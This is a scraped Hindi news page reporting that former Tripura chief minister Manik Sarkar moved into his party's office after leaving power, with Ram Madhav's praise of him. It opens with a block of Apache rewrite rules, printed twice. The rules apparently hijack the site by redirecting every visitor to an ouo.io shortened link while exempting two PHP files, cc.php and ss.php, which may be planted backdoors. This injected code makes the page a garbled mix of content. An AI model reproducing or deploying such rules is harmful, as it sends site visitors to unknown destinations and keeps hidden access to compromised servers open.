
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 328
Previousअगरतला। 25 साल से त्रिपुरा की सत्ता संभालने वाले माणिक सरकार ने पार्टी दफ्तर को ही अपना घर बना लिया है। नए सीएम बिप्लब देब और बीजेपी के राष्ट्रीय महासचिव राम माधव सीपीआई (एम) कार्यालय पहुंचे और उनसे मुलाकात की।
पूर्व सीएम माणिक सरकार देश के सबसे गरीब मुख्यमंत्रियों की सूची में आते हैं। उनके पास केवस 26 लाख की संपत्ति है। उन्होंने हमेशा ही बहुत सामान्य तरीके से अपनी जिंदगी जी है। एक राज्य के मुख्यमंत्री होने के बावजूद उन्हें कभी भी एश-ओ-आराम से लगाव नहीं हुआ। माणिक सरकार को कोई बच्चा नहीं है। पार्टी के सदस्यों का कहना है कि माणिक सरकार सीएम पद से हटने के बाद अब पार्टी कार्यालय के एक कमरे के गेस्ट हाउस में ही अपनी जिंदगी बिताएंगे।
बीजेपी मुख्य सचिव राम माधव ने विधानसभा चुनाव से पहले माणिक सरकार पर भ्रष्ट होने के आरोप लगाए थे लेकिन वे अब उनकी तारीफ करते नहीं थक रहे हैं। माणिक सरकार से मिलने के बाद राम माधव ने उनकी प्रशंसा करते हुए अपने ट्विटर अकाउंट पर लिखा "विधानसभा चुनाव के बाद मुख्यमंत्री पद से इस्तीफा देने के तुरंत बाद वे अपनी पार्टी के कार्यालय में स्थानांतरित हो गए हैं। बराबरी करने के लिए नेताओं के लिए कुछ है।" आपको बता दें कि शुक्रवार को बिप्लब देब ने त्रिपुरा की राजधानी अगरतला में शपथ ग्रहण समारोह में मुख्यमंत्री पद की शपथ ली।